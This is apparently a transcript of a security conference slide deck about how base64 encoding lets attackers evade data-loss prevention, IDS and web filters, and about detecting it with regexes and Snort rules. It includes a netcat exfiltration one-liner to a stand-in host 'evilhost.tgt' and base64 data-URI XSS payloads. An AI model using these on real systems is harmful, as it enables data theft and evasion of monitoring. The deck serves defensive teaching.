Base64 – The Security Killer · Certification Collector GSE#36 (out of 41) CISSP, CISA, GCFA,...
Transcript of Base64 – The Security Killer · Certification Collector GSE#36 (out of 41) CISSP, CISA, GCFA,...
![Page 1: Base64 – The Security Killer · Certification Collector GSE#36 (out of 41) CISSP, CISA, GCFA, GCFW, GCWN, GAWN, GCIA, GCIH, GSEC, GREM, SCSA, RCSE, SnortCP Community SANS …](https://reader031.fdocuments.us/reader031/viewer/2022022515/5afba66d7f8b9a5f58911ce1/html5/thumbnails/1.jpg)
Session ID:Session Classification:
Kevin FiscusNWN Corporation
Base64 – The Security Killer
DAS-203Intermediate
![Page 2: Base64 – The Security Killer · Certification Collector GSE#36 (out of 41) CISSP, CISA, GCFA, GCFW, GCWN, GAWN, GCIA, GCIH, GSEC, GREM, SCSA, RCSE, SnortCP Community SANS …](https://reader031.fdocuments.us/reader031/viewer/2022022515/5afba66d7f8b9a5f58911ce1/html5/thumbnails/2.jpg)
A Short (Made Up) Security Story
Helix Pharmaceuticals is concerned about security
Industrial espionagePolitical and social activists
![Page 3: Base64 – The Security Killer · Certification Collector GSE#36 (out of 41) CISSP, CISA, GCFA, GCFW, GCWN, GAWN, GCIA, GCIH, GSEC, GREM, SCSA, RCSE, SnortCP Community SANS …](https://reader031.fdocuments.us/reader031/viewer/2022022515/5afba66d7f8b9a5f58911ce1/html5/thumbnails/3.jpg)
Helix Security Program
Strong passwordsDLPNIDSWeb FilteringMail FilteringWeb Application Firewall
Hard Drive EncryptionPhysical SecuritySearch & Bag InspectionFirewallAnti-VirusEvent Correlation
![Page 4: Base64 – The Security Killer · Certification Collector GSE#36 (out of 41) CISSP, CISA, GCFA, GCFW, GCWN, GAWN, GCIA, GCIH, GSEC, GREM, SCSA, RCSE, SnortCP Community SANS …](https://reader031.fdocuments.us/reader031/viewer/2022022515/5afba66d7f8b9a5f58911ce1/html5/thumbnails/4.jpg)
Oops
Significant loss of intellectual propertyPasswords compromisedDLP EvadedIDS EvadedWeb Security Bypassed
![Page 5: Base64 – The Security Killer · Certification Collector GSE#36 (out of 41) CISSP, CISA, GCFA, GCFW, GCWN, GAWN, GCIA, GCIH, GSEC, GREM, SCSA, RCSE, SnortCP Community SANS …](https://reader031.fdocuments.us/reader031/viewer/2022022515/5afba66d7f8b9a5f58911ce1/html5/thumbnails/5.jpg)
The Cause
After a lengthy investigation a single technology was found to be the cause
Base64
SGVsaXggUGhhcm1hIHN1cGVyIHNlY3JldCBpbmZvcm1hdGlvbiB0aGF0IHdhcyBzdG9sZW4gYnkgdGhlIHJlYWxseS
BuYXN0eSBiYWQgZ3V5IQ==
![Page 6: Base64 – The Security Killer · Certification Collector GSE#36 (out of 41) CISSP, CISA, GCFA, GCFW, GCWN, GAWN, GCIA, GCIH, GSEC, GREM, SCSA, RCSE, SnortCP Community SANS …](https://reader031.fdocuments.us/reader031/viewer/2022022515/5afba66d7f8b9a5f58911ce1/html5/thumbnails/6.jpg)
Introduction
Kevin FiscusNational Practice Director - NWN Corporation22 years overall IT experience11 years focused on information securityCertification Collector
GSE#36 (out of 41)CISSP, CISA, GCFA, GCFW, GCWN, GAWN, GCIA, GCIH, GSEC, GREM, SCSA, RCSE, SnortCP
Community SANS Instructor
6
![Page 7: Base64 – The Security Killer · Certification Collector GSE#36 (out of 41) CISSP, CISA, GCFA, GCFW, GCWN, GAWN, GCIA, GCIH, GSEC, GREM, SCSA, RCSE, SnortCP Community SANS …](https://reader031.fdocuments.us/reader031/viewer/2022022515/5afba66d7f8b9a5f58911ce1/html5/thumbnails/7.jpg)
Overview
7
![Page 8: Base64 – The Security Killer · Certification Collector GSE#36 (out of 41) CISSP, CISA, GCFA, GCFW, GCWN, GAWN, GCIA, GCIH, GSEC, GREM, SCSA, RCSE, SnortCP Community SANS …](https://reader031.fdocuments.us/reader031/viewer/2022022515/5afba66d7f8b9a5f58911ce1/html5/thumbnails/8.jpg)
What Is Base64
Encoding schemeOriginally designed to represent binary data as ASCII text
![Page 9: Base64 – The Security Killer · Certification Collector GSE#36 (out of 41) CISSP, CISA, GCFA, GCFW, GCWN, GAWN, GCIA, GCIH, GSEC, GREM, SCSA, RCSE, SnortCP Community SANS …](https://reader031.fdocuments.us/reader031/viewer/2022022515/5afba66d7f8b9a5f58911ce1/html5/thumbnails/9.jpg)
Encoding
Displaying information in a variety of formats
ASCII: CatHexadecimal: 0x43 61 74Decimal: 67 97 116Octal: 103 141 164Binary: 01000011 01100001 01110100
Glyph Hex Dec Oct Binary
A 0x41 65 101 100 0001
a 0x62 97 141 110 0001
! 0x21 33 041 010 0001
Backspace 0x08 8 010 000 1000
![Page 10: Base64 – The Security Killer · Certification Collector GSE#36 (out of 41) CISSP, CISA, GCFA, GCFW, GCWN, GAWN, GCIA, GCIH, GSEC, GREM, SCSA, RCSE, SnortCP Community SANS …](https://reader031.fdocuments.us/reader031/viewer/2022022515/5afba66d7f8b9a5f58911ce1/html5/thumbnails/10.jpg)
Encoding vs. Encryption
Encoding may seem like encryption but…Encryption/decryption requires a keyEncoding/decryption requires only knowledge of the type of encoding
![Page 11: Base64 – The Security Killer · Certification Collector GSE#36 (out of 41) CISSP, CISA, GCFA, GCFW, GCWN, GAWN, GCIA, GCIH, GSEC, GREM, SCSA, RCSE, SnortCP Community SANS …](https://reader031.fdocuments.us/reader031/viewer/2022022515/5afba66d7f8b9a5f58911ce1/html5/thumbnails/11.jpg)
Types of Encoding
Encoding Number of Digits Range of DigitsBinary 2 0, 1Octal 8 0 – 7Decimal 10 0 – 9Hexadecimal 16 0 – 9, a, b, c, d, e, fBase64 64 0‐9, a‐z, A‐Z, 2 symbols
Symbols may include forward slash (/), plus (+), dash (-), underscore (_), period (.), colon (:) and exclamation point (!)
![Page 12: Base64 – The Security Killer · Certification Collector GSE#36 (out of 41) CISSP, CISA, GCFA, GCFW, GCWN, GAWN, GCIA, GCIH, GSEC, GREM, SCSA, RCSE, SnortCP Community SANS …](https://reader031.fdocuments.us/reader031/viewer/2022022515/5afba66d7f8b9a5f58911ce1/html5/thumbnails/12.jpg)
Uses of Base64
Web site basic authenticationReplacement for uuencode Evasion of basic anti-spamming toolsEncoding of character strings in LDAP LDIF filesEncoding of binary files (images) within scripts or HTML to avoid depending on external dataCommunicating encrypted cookie information
![Page 13: Base64 – The Security Killer · Certification Collector GSE#36 (out of 41) CISSP, CISA, GCFA, GCFW, GCWN, GAWN, GCIA, GCIH, GSEC, GREM, SCSA, RCSE, SnortCP Community SANS …](https://reader031.fdocuments.us/reader031/viewer/2022022515/5afba66d7f8b9a5f58911ce1/html5/thumbnails/13.jpg)
Base64 Problems
Password DisclosureDLP BypassEnd User CompromiseWeb Application AttacksMalware
![Page 14: Base64 – The Security Killer · Certification Collector GSE#36 (out of 41) CISSP, CISA, GCFA, GCFW, GCWN, GAWN, GCIA, GCIH, GSEC, GREM, SCSA, RCSE, SnortCP Community SANS …](https://reader031.fdocuments.us/reader031/viewer/2022022515/5afba66d7f8b9a5f58911ce1/html5/thumbnails/14.jpg)
Password Disclosure
14
![Page 15: Base64 – The Security Killer · Certification Collector GSE#36 (out of 41) CISSP, CISA, GCFA, GCFW, GCWN, GAWN, GCIA, GCIH, GSEC, GREM, SCSA, RCSE, SnortCP Community SANS …](https://reader031.fdocuments.us/reader031/viewer/2022022515/5afba66d7f8b9a5f58911ce1/html5/thumbnails/15.jpg)
Password Disclosure
Basic web authentication encodes username and password as base64Basic web authentication used for application authentication
Identified one anti-virus vendor that used basic web authentication for signature updates
You don’t use basic web authentication?Do your users?Do they reuse passwords?
![Page 16: Base64 – The Security Killer · Certification Collector GSE#36 (out of 41) CISSP, CISA, GCFA, GCFW, GCWN, GAWN, GCIA, GCIH, GSEC, GREM, SCSA, RCSE, SnortCP Community SANS …](https://reader031.fdocuments.us/reader031/viewer/2022022515/5afba66d7f8b9a5f58911ce1/html5/thumbnails/16.jpg)
DLP Bypass
16
![Page 17: Base64 – The Security Killer · Certification Collector GSE#36 (out of 41) CISSP, CISA, GCFA, GCFW, GCWN, GAWN, GCIA, GCIH, GSEC, GREM, SCSA, RCSE, SnortCP Community SANS …](https://reader031.fdocuments.us/reader031/viewer/2022022515/5afba66d7f8b9a5f58911ce1/html5/thumbnails/17.jpg)
DLP Bypass
Regular expression to identify SSNs^(?!000)([0-6]\d{2}|7([0-6]\d|7[012]))([ -]?)(?!00)\d\d\3(?!0000)\d{4}$
Consider something simple - encoded SSNs
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
M T L z L T Q 1 L T Y 3 O D k =
M T E x L T E x L T E x M T E =
M j l y L T l y L T I y M j I =
M z M z L T M z L T M z M z M =
![Page 18: Base64 – The Security Killer · Certification Collector GSE#36 (out of 41) CISSP, CISA, GCFA, GCFW, GCWN, GAWN, GCIA, GCIH, GSEC, GREM, SCSA, RCSE, SnortCP Community SANS …](https://reader031.fdocuments.us/reader031/viewer/2022022515/5afba66d7f8b9a5f58911ce1/html5/thumbnails/18.jpg)
Detection
Source Base64 Encoded
Secret U2VjcmV0
Secret (1 leading space) IFN1Y3J1dA==
Secret (2 leading spaces) ICBTZWNyZXQ=
SECRET U0VDUkVU
S E C R E T UyBFIEMgUiBFIFQ=
• Why not simply create signatures that detect the base64 version of sensitive data?
• Unfortunately, it’s not that simple
![Page 19: Base64 – The Security Killer · Certification Collector GSE#36 (out of 41) CISSP, CISA, GCFA, GCFW, GCWN, GAWN, GCIA, GCIH, GSEC, GREM, SCSA, RCSE, SnortCP Community SANS …](https://reader031.fdocuments.us/reader031/viewer/2022022515/5afba66d7f8b9a5f58911ce1/html5/thumbnails/19.jpg)
Exfiltration Example
Data exfiltration on a Mac OS X box via tcp 443:tar -czf - localdir | base64 | nc evilhost.tgt 443
On remote evil box, just have netcat reverse it:nc -l 443 | base64 -d >tarfile.tar.gz
19
![Page 20: Base64 – The Security Killer · Certification Collector GSE#36 (out of 41) CISSP, CISA, GCFA, GCFW, GCWN, GAWN, GCIA, GCIH, GSEC, GREM, SCSA, RCSE, SnortCP Community SANS …](https://reader031.fdocuments.us/reader031/viewer/2022022515/5afba66d7f8b9a5f58911ce1/html5/thumbnails/20.jpg)
Attacking End Users
20
![Page 21: Base64 – The Security Killer · Certification Collector GSE#36 (out of 41) CISSP, CISA, GCFA, GCFW, GCWN, GAWN, GCIA, GCIH, GSEC, GREM, SCSA, RCSE, SnortCP Community SANS …](https://reader031.fdocuments.us/reader031/viewer/2022022515/5afba66d7f8b9a5f58911ce1/html5/thumbnails/21.jpg)
XSS – Cross Site Scripting
Wikipedia says “XSS is a vulnerability typically found in web applications that enables attackers to inject client-side script into web pages viewed by other users.”What?
![Page 22: Base64 – The Security Killer · Certification Collector GSE#36 (out of 41) CISSP, CISA, GCFA, GCFW, GCWN, GAWN, GCIA, GCIH, GSEC, GREM, SCSA, RCSE, SnortCP Community SANS …](https://reader031.fdocuments.us/reader031/viewer/2022022515/5afba66d7f8b9a5f58911ce1/html5/thumbnails/22.jpg)
Example
Consider a web search similar to Google
You type “something interesting”
The web page responds with “you just searched for ‘something interesting’ ”
What happens if you search for “<SCRIPT>alert(‘XSS’)</SCRIPT>”?
![Page 23: Base64 – The Security Killer · Certification Collector GSE#36 (out of 41) CISSP, CISA, GCFA, GCFW, GCWN, GAWN, GCIA, GCIH, GSEC, GREM, SCSA, RCSE, SnortCP Community SANS …](https://reader031.fdocuments.us/reader031/viewer/2022022515/5afba66d7f8b9a5f58911ce1/html5/thumbnails/23.jpg)
What Can XSS Do?
Sensitive Information TheftCredential Theft: Stealing cookies, then stealing sessionsFile Theft: Using Ajax techniques, upload files to attacker
Intranet ScanningJavaScript port scanning Vulnerability scanning possible?
Attacking UsersControl web browser, browser history, identify browser plug-ins, JavaScript buffer overflow, remote code execution
![Page 24: Base64 – The Security Killer · Certification Collector GSE#36 (out of 41) CISSP, CISA, GCFA, GCFW, GCWN, GAWN, GCIA, GCIH, GSEC, GREM, SCSA, RCSE, SnortCP Community SANS …](https://reader031.fdocuments.us/reader031/viewer/2022022515/5afba66d7f8b9a5f58911ce1/html5/thumbnails/24.jpg)
But That Affects Web Apps
Not So FastData URI - data:text/html;base64, content<SCRIPT>alert(“Pwned”);</SCRIPT> Base64: PFNDUklQVD5hbGVydCgiUHduZWQiKTs8L1NDUklQVD4= Combined: data:text/html;base64, PFNDUklQVD5hbGVydCgiUHduZWQiKTs8L1NDUklQVD4=http://tinyurl.com/6bddyunHave you clicked on a shortened URL lately?
![Page 25: Base64 – The Security Killer · Certification Collector GSE#36 (out of 41) CISSP, CISA, GCFA, GCFW, GCWN, GAWN, GCIA, GCIH, GSEC, GREM, SCSA, RCSE, SnortCP Community SANS …](https://reader031.fdocuments.us/reader031/viewer/2022022515/5afba66d7f8b9a5f58911ce1/html5/thumbnails/25.jpg)
Why This Is Bad
JavaScript not passed in the clear avoiding IDS/IPSSingle-click attack – once you click the URL, the code runsNo skill to execute
![Page 26: Base64 – The Security Killer · Certification Collector GSE#36 (out of 41) CISSP, CISA, GCFA, GCFW, GCWN, GAWN, GCIA, GCIH, GSEC, GREM, SCSA, RCSE, SnortCP Community SANS …](https://reader031.fdocuments.us/reader031/viewer/2022022515/5afba66d7f8b9a5f58911ce1/html5/thumbnails/26.jpg)
Good News – Bad News
This attack does not work if IE is your default browserIt does work in Firefox, Safari, Chrome, iPhones and iPadsHow many people in your organization would this affect?What type of user are they?
![Page 27: Base64 – The Security Killer · Certification Collector GSE#36 (out of 41) CISSP, CISA, GCFA, GCFW, GCWN, GAWN, GCIA, GCIH, GSEC, GREM, SCSA, RCSE, SnortCP Community SANS …](https://reader031.fdocuments.us/reader031/viewer/2022022515/5afba66d7f8b9a5f58911ce1/html5/thumbnails/27.jpg)
Web Application Attacks
27
![Page 28: Base64 – The Security Killer · Certification Collector GSE#36 (out of 41) CISSP, CISA, GCFA, GCFW, GCWN, GAWN, GCIA, GCIH, GSEC, GREM, SCSA, RCSE, SnortCP Community SANS …](https://reader031.fdocuments.us/reader031/viewer/2022022515/5afba66d7f8b9a5f58911ce1/html5/thumbnails/28.jpg)
Web Application Attacks
Cross Site Scripting DetectionOften looking for <SCRIPT> or similar
But what about…<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
![Page 29: Base64 – The Security Killer · Certification Collector GSE#36 (out of 41) CISSP, CISA, GCFA, GCFW, GCWN, GAWN, GCIA, GCIH, GSEC, GREM, SCSA, RCSE, SnortCP Community SANS …](https://reader031.fdocuments.us/reader031/viewer/2022022515/5afba66d7f8b9a5f58911ce1/html5/thumbnails/29.jpg)
Malware
29
![Page 30: Base64 – The Security Killer · Certification Collector GSE#36 (out of 41) CISSP, CISA, GCFA, GCFW, GCWN, GAWN, GCIA, GCIH, GSEC, GREM, SCSA, RCSE, SnortCP Community SANS …](https://reader031.fdocuments.us/reader031/viewer/2022022515/5afba66d7f8b9a5f58911ce1/html5/thumbnails/30.jpg)
Malware
Botnets consist of thousands or millions of slaves or “zombies” that are centrally controlledOriginally IRC was used as the controlWho uses IRC on corporate networks?What about HTTP?But that would be obvious
![Page 31: Base64 – The Security Killer · Certification Collector GSE#36 (out of 41) CISSP, CISA, GCFA, GCFW, GCWN, GAWN, GCIA, GCIH, GSEC, GREM, SCSA, RCSE, SnortCP Community SANS …](https://reader031.fdocuments.us/reader031/viewer/2022022515/5afba66d7f8b9a5f58911ce1/html5/thumbnails/31.jpg)
HTTP Controllers
If the commands were visible on the page…What about comments fields?
If the commands were passed in the clear they could be detected or loggedAnswer – encode the commands via base64Incorporate a base64 decoder in the bot
![Page 32: Base64 – The Security Killer · Certification Collector GSE#36 (out of 41) CISSP, CISA, GCFA, GCFW, GCWN, GAWN, GCIA, GCIH, GSEC, GREM, SCSA, RCSE, SnortCP Community SANS …](https://reader031.fdocuments.us/reader031/viewer/2022022515/5afba66d7f8b9a5f58911ce1/html5/thumbnails/32.jpg)
Detection
32
![Page 33: Base64 – The Security Killer · Certification Collector GSE#36 (out of 41) CISSP, CISA, GCFA, GCFW, GCWN, GAWN, GCIA, GCIH, GSEC, GREM, SCSA, RCSE, SnortCP Community SANS …](https://reader031.fdocuments.us/reader031/viewer/2022022515/5afba66d7f8b9a5f58911ce1/html5/thumbnails/33.jpg)
OK, So Base64 is Bad, Now What?
Wouldn’t it be great if we could detect base64 on our networkThat should be easy…
![Page 34: Base64 – The Security Killer · Certification Collector GSE#36 (out of 41) CISSP, CISA, GCFA, GCFW, GCWN, GAWN, GCIA, GCIH, GSEC, GREM, SCSA, RCSE, SnortCP Community SANS …](https://reader031.fdocuments.us/reader031/viewer/2022022515/5afba66d7f8b9a5f58911ce1/html5/thumbnails/34.jpg)
Not So Fast
Application specific base64 is easy to detectDetecting base64 in a way that:
Is application independentCan address base64 in the header or payload
MUCH Harder!!!
34
![Page 35: Base64 – The Security Killer · Certification Collector GSE#36 (out of 41) CISSP, CISA, GCFA, GCFW, GCWN, GAWN, GCIA, GCIH, GSEC, GREM, SCSA, RCSE, SnortCP Community SANS …](https://reader031.fdocuments.us/reader031/viewer/2022022515/5afba66d7f8b9a5f58911ce1/html5/thumbnails/35.jpg)
Application Specific
Detecting base64 used with basic web authEmerging Threats snort rulealert tcp $HOME_NET any -> any $HTTP_PORTS (flow:established,to_server; content:"|0d 0a|Authorization|3a 20|Basic"; nocase; content:!"YW5vbnltb3VzOg=="; within:32;)
![Page 36: Base64 – The Security Killer · Certification Collector GSE#36 (out of 41) CISSP, CISA, GCFA, GCFW, GCWN, GAWN, GCIA, GCIH, GSEC, GREM, SCSA, RCSE, SnortCP Community SANS …](https://reader031.fdocuments.us/reader031/viewer/2022022515/5afba66d7f8b9a5f58911ce1/html5/thumbnails/36.jpg)
Other Base64 Not As Easy
What does base64 look likeContains letters and numbersContains special characters
Could be plus and forward slashCould be other characters
May or may not contain trailing equal signsThe following would fit the description
com/something/somethingelse/something123abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWZYZ1234567890+/
![Page 37: Base64 – The Security Killer · Certification Collector GSE#36 (out of 41) CISSP, CISA, GCFA, GCFW, GCWN, GAWN, GCIA, GCIH, GSEC, GREM, SCSA, RCSE, SnortCP Community SANS …](https://reader031.fdocuments.us/reader031/viewer/2022022515/5afba66d7f8b9a5f58911ce1/html5/thumbnails/37.jpg)
Detection Options - RegEx
[0-9a-zA-Z+/=]{20,}Extremely high false positives
(?:[A-Za-z0-9+/]{4}){2,}(?:[A-Za-z0-9+/]{2}[AEIMQUYcgkosw048]=|[A-Za-z0-9+/][AQgw]==)
Fewer false positives but false negativesOne out of 3 base64 (looking for =)
![Page 38: Base64 – The Security Killer · Certification Collector GSE#36 (out of 41) CISSP, CISA, GCFA, GCFW, GCWN, GAWN, GCIA, GCIH, GSEC, GREM, SCSA, RCSE, SnortCP Community SANS …](https://reader031.fdocuments.us/reader031/viewer/2022022515/5afba66d7f8b9a5f58911ce1/html5/thumbnails/38.jpg)
Detection Recommendation
Identify the most critical threatWeb application attackUse of basic web authenticationAttack against end users (e.g. XSS)Data exfiltration
Use dedicated detection sensorsEmploy an active program involving continual improvement
38
![Page 39: Base64 – The Security Killer · Certification Collector GSE#36 (out of 41) CISSP, CISA, GCFA, GCFW, GCWN, GAWN, GCIA, GCIH, GSEC, GREM, SCSA, RCSE, SnortCP Community SANS …](https://reader031.fdocuments.us/reader031/viewer/2022022515/5afba66d7f8b9a5f58911ce1/html5/thumbnails/39.jpg)
Overall Methodology
![Page 40: Base64 – The Security Killer · Certification Collector GSE#36 (out of 41) CISSP, CISA, GCFA, GCFW, GCWN, GAWN, GCIA, GCIH, GSEC, GREM, SCSA, RCSE, SnortCP Community SANS …](https://reader031.fdocuments.us/reader031/viewer/2022022515/5afba66d7f8b9a5f58911ce1/html5/thumbnails/40.jpg)
Summary
40
![Page 41: Base64 – The Security Killer · Certification Collector GSE#36 (out of 41) CISSP, CISA, GCFA, GCFW, GCWN, GAWN, GCIA, GCIH, GSEC, GREM, SCSA, RCSE, SnortCP Community SANS …](https://reader031.fdocuments.us/reader031/viewer/2022022515/5afba66d7f8b9a5f58911ce1/html5/thumbnails/41.jpg)
Summary
Base64 is commonBase64 is dangerousBase64 is hard to detectDetection is possible but it takes effort
41
![Page 42: Base64 – The Security Killer · Certification Collector GSE#36 (out of 41) CISSP, CISA, GCFA, GCFW, GCWN, GAWN, GCIA, GCIH, GSEC, GREM, SCSA, RCSE, SnortCP Community SANS …](https://reader031.fdocuments.us/reader031/viewer/2022022515/5afba66d7f8b9a5f58911ce1/html5/thumbnails/42.jpg)
How To Apply What You Learned
Evaluate your organizations susceptibility to base64-based attacksDevelop a strategy for detecting base64Identify malicious base64 used in your organization
42
![Page 43: Base64 – The Security Killer · Certification Collector GSE#36 (out of 41) CISSP, CISA, GCFA, GCFW, GCWN, GAWN, GCIA, GCIH, GSEC, GREM, SCSA, RCSE, SnortCP Community SANS …](https://reader031.fdocuments.us/reader031/viewer/2022022515/5afba66d7f8b9a5f58911ce1/html5/thumbnails/43.jpg)
Applying What You Learned – BASE
Begin to implement a base64 detection programLinux, Snort and regular expressions are your friends
Assess your existing controls to determine your susceptibility to base64 compromiseSecure or harden your environment using existing controls
E.g. eliminate basic web authenticationEducate others in your organization about the risks associated with base64
43
![Page 44: Base64 – The Security Killer · Certification Collector GSE#36 (out of 41) CISSP, CISA, GCFA, GCFW, GCWN, GAWN, GCIA, GCIH, GSEC, GREM, SCSA, RCSE, SnortCP Community SANS …](https://reader031.fdocuments.us/reader031/viewer/2022022515/5afba66d7f8b9a5f58911ce1/html5/thumbnails/44.jpg)
Questions
Web: www.nwnit.comEmail: [email protected]: nwnsecurity.blogspot.comFacebook: www.facebook.com/kevinbfiscusFacebook: www.facebook.com/nwnstarTwitter: @kevinbfiscusTwitter: @nwnsecurity
44